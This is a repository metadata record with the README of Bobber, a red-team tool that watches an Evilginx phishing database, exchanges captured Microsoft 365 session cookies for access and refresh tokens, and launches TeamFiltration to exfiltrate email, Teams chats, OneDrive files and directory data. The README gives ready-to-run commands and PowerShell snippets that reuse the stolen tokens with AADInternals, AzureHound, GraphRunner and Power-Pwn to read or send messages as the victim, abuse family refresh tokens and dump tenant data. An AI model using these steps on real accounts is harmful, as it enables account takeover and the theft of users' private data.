{"id":18831762,"url":"https://github.com/flangvik/bobber","last_synced_at":"2025-05-08T23:48:43.402Z","repository":{"id":205966384,"uuid":"710491712","full_name":"Flangvik/Bobber","owner":"Flangvik","description":"Bounces when a fish bites - Evilginx database monitoring with exfiltration automation","archived":false,"fork":false,"pushed_at":"2024-06-09T11:19:46.000Z","size":99,"stargazers_count":168,"open_issues_count":0,"forks_count":14,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-08T23:48:35.971Z","etag":null,"topics":["aad","entraid","evilginx","exfiltration","o365","pentesting","phishing","python","roadtools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Flangvik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-26T20:00:49.000Z","updated_at":"2025-04-29T04:01:45.000Z","dependencies_parsed_at":"2024-06-09T12:42:46.061Z","dependency_job_id":null,"html_url":"https://github.com/Flangvik/Bobber","commit_stats":null,"previous_names":["flangvik/bobber"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FBobber/manifests","owner_url":"https://repos.ecosyste
.ms/api/v1/hosts/GitHub/owners/Flangvik","download_url":"https://codeload.github.com/Flangvik/Bobber/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253166477,"owners_count":21864467,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["aad","entraid","evilginx","exfiltration","o365","pentesting","phishing","python","roadtools"],"created_at":"2024-11-08T01:55:55.080Z","updated_at":"2025-05-08T23:48:43.377Z","avatar_url":"https://github.com/Flangvik.png","language":"Python","readme":"# Bobber - Bounces when a fish bites!\n```\n                                         ▓▓                                                         \n                                         ▓▓▓                                                        \n                                          ▓▓                                                        \n                                          ▓▓▓                                                       \n                                           ▓▓                                                       \n                                           ▓▓▓                                                      \n                                            ▓▓                                                      \n                                            ▓▓▓                                                     \n                                             ▓▓                                                     \n                                             ▓▓▓                                            
        \n                           ░░░░░░░░░░░░░░░░░░█▓▓▓▓▓░░░░░░░░░░░░░                                    \n                 ░░░░░░░░                   ▓▓▓█▓▓▓▓▓             ░░░░░░░░                          \n           ░░░░░░             ░░░░░░░░░░░░░▓▓▓▓▓▓█▓█▓▓▓░░░░░░             ░░░░░░                    \n      ░░░░░░          ░░░░░░               ▓▓█▓▓▓▓▓▓▓▓▓▓       ░░░░░░           ░░░░░               \n   ░░░░░         ░░░░░           ░░░░░░░░░░▓▓▓▓█▓▓▓▓█▓▓▓░░           ░░░░░         ░░░░░            \n ░░░░░        ░░░░░         ░░░░░          ▓█▓▓▓▓█▓▓▓▓█▓▓ ░░░░░         ░░░░░        ░░░░░          \n░░░░░        ░░░░        ░░░░░          ░░░▒▓▓▓▓▓▓▓▓█▓▓▓▓    ░░░░░        ░░░░        ░░░░░         \n░░░░        ░░░░░        ░░░░          ░░░ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒     ░░░░        ░░░░░        ░░░░       \n ░░░░        ░░░░░        ░░░░░         ░░░░░▒▒▒▒▒▒▒▒▒▒▒  ░░░░░░         ░░░░░        ░░░░      \n  ░░░░░        ░░░░░         ░░░░            ░░░░░░         ░░░░░        ░░ \n    ░░░░░         ░░░░░           ░░░░░░░░        ░░░░░░░░           ░░░░░         ░░░   \n                                                                        \n                                Bobber - Bounces when a fish bites!\n```\nBobber monitors a given Evilginx database file for changes, and if a valid Evilginx session complete with a captured Microsoft Office 365 cookie is found, Bobber will utilize the RoadTools RoadTX library to retrieve the access and refresh tokens for the user, then optionally trigger TeamFiltration to exfiltrate all the sweet, sweet loot. 
Bobber supports monitoring a local file path or a file path on a remote host through SSH.\n\nBobber accepts a number of input arguments to adjust the RoadTools interactive auth flow, selection between key and credential-based SSH auth, as well as the added benefit of receiving Pushover notifications once a user submits their credentials and the loot is on the way.\n\nCheck out the TrustedSec blog post [The Triforce of Initial Access](https://trustedsec.com/blog/the-triforce-of-initial-access) for more information.\n\n```\nusage: bobber.py [-h] [--host HOST] [--port PORT] [--username USERNAME] [--password PASSWORD] [--key KEY]\n                 [--user-key USER_KEY] [--api-token API_TOKEN] [--all] [--aad] [--teams] [--onedrive] [--owa]\n                 [--owa-limit OWA_LIMIT] [--tf-path TF_PATH] [-c CLIENT] [-r RESOURCE] [-s SCOPE] [-ru URL]\n                 [-t TENANT] [-d DRIVER_PATH] [-k]\n                 database_path\n\npositional arguments:\n  database_path         Path to the local OR remote Evilginx database file.\n\noptions:\n  -h, --help            show this help message and exit\n\nSSH Options:\n  Evilginx database monitoring SSH options\n\n  --host HOST           SSH hostname/IP when fetching from a remote host.\n  --port PORT           SSH port when fetching from a remote host.\n  --username USERNAME   SSH username when fetching from a remote host.\n  --password PASSWORD   SSH password when fetching from a remote host.\n  --key KEY             Path to the SSH private key file for authentication.\n\nPushover Options:\n  Pushover notifications options\n\n  --user-key USER_KEY   Pushover User Key\n  --api-token API_TOKEN\n                        Pushover API Token\n\nTeamFiltration Options:\n  Exfiltration options for TeamFiltration\n\n  --all                 Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)\n  --aad                 Exfiltrate information from Graph API (domain users and groups)\n  --teams            
   Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)\n  --onedrive            Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the user's entire OneDrive directory)\n  --owa                 Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received)\n  --owa-limit OWA_LIMIT\n                        Set the max amount of emails to exfiltrate, default is 2k.\n  --tf-path TF_PATH     Path to your TeamFiltration file on disk (download from https://github.com/Flangvik/TeamFiltration/releases/latest)\n\nRoadTools Options:\n  RoadTools RoadTX interactive authentication options\n\n  -c CLIENT, --client CLIENT\n                        Client ID (application ID / GUID ) to use when authenticating (Teams Client by default)\n  -r RESOURCE, --resource RESOURCE\n                        Resource to authenticate to. Either a full URL or alias (list with roadtx listaliases)\n  -s SCOPE, --scope SCOPE\n                        Scope to use. Will automatically switch to v2.0 auth endpoint if specified. If unsure use -r instead.\n  -ru URL, --redirect-url URL\n                        Redirect URL used when authenticating (default: https://login.microsoftonline.com/common/oauth2/nativeclient)\n  -t TENANT, --tenant TENANT\n                        Tenant ID or domain to auth to\n  -d DRIVER_PATH, --driver-path DRIVER_PATH\n                        Path to geckodriver file on disk (download from: https://github.com/mozilla/geckodriver/releases/latest)\n  -k, --keep-open       Do not close the browser window after timeout. Useful if you want to browse online apps with the obtained credentials\n```\n# Setup\n\n1. `git clone https://github.com/Flangvik/Bobber`\n2. `pip install -r requirements.txt`\n3. Download the latest version of [TeamFiltration](https://github.com/Flangvik/TeamFiltration/releases/latest) for your platform, and place the binary inside the Bobber folder (Optional)\n4. 
Download the latest version of [Geckodriver](https://github.com/mozilla/geckodriver/releases) for your platform, and place the binary inside the Bobber folder\n5. `python3 Bobber.py --help` and get going!\n\n# Example Usage\n\nMonitor a remote file for changes via SSH, authenticate using your default SSH key (~/.ssh/id_rsa), keep the browser session open after RoadTools has exchanged the captured cookie for JWT tokens, and exfiltrate only AAD Users and Groups data from the Graph API.\n```powershell\npython bobber.py \"/root/.evilginx/data.db\" --username root --host 1337.66.69.420 --keep-open --aad\n```\n\nMonitor a local file for changes, exchange the captured cookies for JWT tokens, and exfiltrate only emails.\n```powershell\npython bobber.py evilginx_data.db --host 1337.66.69.420  --owa \n```\n\nMonitor a remote file for changes over SSH, authenticate using username and password, exchange the captured cookies for JWT tokens, and exfiltrate all data available.\n```powershell\npython bobber.py \"/root/.evilginx/data.db\" --username root --password 'MySuperPass123!' --all\n```\n\n\n# Usage with other tools\nWhen Bobber captures a complete Evilginx session, tokens retrieved using RoadTools will be stored in a file using the following naming convention `.sanitized_email_roadtools_auth`. This file can be used in combination with many other tools besides TeamFiltration. Here are a few examples from the context of a PowerShell prompt.\n\n
### AADInternals\n[AADInternals](https://aadinternals.com/aadinternals/#introduction) is a modular PowerShell framework for exploring the pathways your access might have, created by my favorite Finnish person [@DrAzureAD](https://twitter.com/DrAzureAD)\n\n```powershell\n#Read and parse the RoadTools auth file into a JSON object\n$roadToolsAuth = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Add the token information from RoadTools to the cache so it will be used for auth\nAdd-AADIntAccessTokenToCache -AccessToken $roadToolsAuth.accessToken -RefreshToken $roadToolsAuth.refreshToken\n\n#Read Teams messages from the GraphAPI\nGet-AADIntTeamsMessages | Format-Table id,content,deletiontime,*type*,DisplayName\n\n# Send a Teams message to a user using the GraphAPI\nSend-AADIntTeamsMessage -Recipients \"bruce.wayne@example.com\" -Message \"Hello there, BATMAN!\"\n\n#Abuse [Family Refresh Tokens](https://github.com/secureworks/family-of-client-ids-research#abusing-family-refresh-tokens-for-unauthorized-access-and-persistence-in-azure-active-directory) to refresh as the \"Microsoft Azure PowerShell\" application (1950a258-227b-4e31-a9cf-717495945fc2). Obtains an access token with a different scope.\n$msAzJWT = Get-AADIntAccessTokenWithRefreshToken -ClientId \"1950a258-227b-4e31-a9cf-717495945fc2\" -Resource \"https://graph.microsoft.com\" -TenantId $roadToolsAuth.tenantId -RefreshToken $roadToolsAuth.refreshToken -SaveToCache 1 -IncludeRefreshToken 1\n```\n\n
### AzureHound\n[AzureHound](https://github.com/BloodHoundAD/AzureHound) is a BloodHound data collector for Microsoft Azure, from the great people over at [@SpecterOps](https://twitter.com/SpecterOps)\n\n```powershell\n#Read and parse RoadTools auth file into a JSON object\n$roadToolsAuth = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Use the refresh token and tenantId to run AzureHound against the tenant\n./azurehound.exe -r $roadToolsAuth.refreshToken -t $roadToolsAuth.tenantId list -o output.json\n```\n\n
### GraphRunner\n[GraphRunner](https://github.com/dafthack/GraphRunner) is a PowerShell-based post-exploitation toolset for interacting with the Microsoft Graph API, by [@dafthack](https://twitter.com/dafthack)\n```powershell\n#Import GraphRunner\nImport-Module .\\GraphRunner.ps1\n\n#Read and parse RoadTools auth file into a JSON object\n#While the JSON object of roadtools does not match what GraphRunner needs, enough properties match to \"trick\" GraphRunner into allowing us to run RefreshGraphTokens\n$tokens = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Run RefreshGraphTokens to update our $tokens var (the refresh token and tenant ID come from the parsed file)\nInvoke-RefreshGraphTokens -RefreshToken $tokens.refreshToken -tenantid $tokens.tenantId\n\n#Most common command to dump a series of information from the Graph API\nInvoke-GraphRunner -Tokens $tokens\n```\n\n\n
### Power-Pwn\n[Power-Pwn](https://github.com/mbrg/power-pwn) is a Python-based offensive security toolset for targeting the Microsoft 365 Power Platform, by [@mbrg0](https://twitter.com/mbrg0)\n```powershell\n#Read and parse RoadTools auth file into a JSON object\n$roadToolsAuth = Get-Content .\\firstname_lastname_example_com_roadtools_auth -raw | ConvertFrom-Json\n\n#Create tokens.json in the same directory you are running powerpwn.exe from\n@{cli_refresh_token = $roadToolsAuth.refreshToken } | ConvertTo-Json | Set-Content -Path 'tokens.json'\n\n#Perform recon of possible Power Platform deployments\n./powerpwn.exe recon -t $roadToolsAuth.tenantId\n\n#Dump data from found Power Platform deployments\n./powerpwn.exe dump -t $roadToolsAuth.tenantId\n```\n\n
# Todo\n- [ ] Add an option to specify a proxy URL for token retrieval and exfiltration\n- [ ] Allow for capture and notification for other username + password + cookie combinations (rather than only O365)\n- [ ] Options to get Pushover notifications even if only username + password was captured (no cookie)\n\n# Credits\n- [@_dirkjan](https://twitter.com/_dirkjan) for the amazing work that is [RoadTools](https://github.com/dirkjanm/ROADtools)\n- [mrgretzky](https://twitter.com/mrgretzky) for raising the standard of phishing simulation with the [evilginx2](https://github.com/kgretzky/evilginx2) toolkit\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fbobber","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflangvik%2Fbobber","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fbobber/lists"}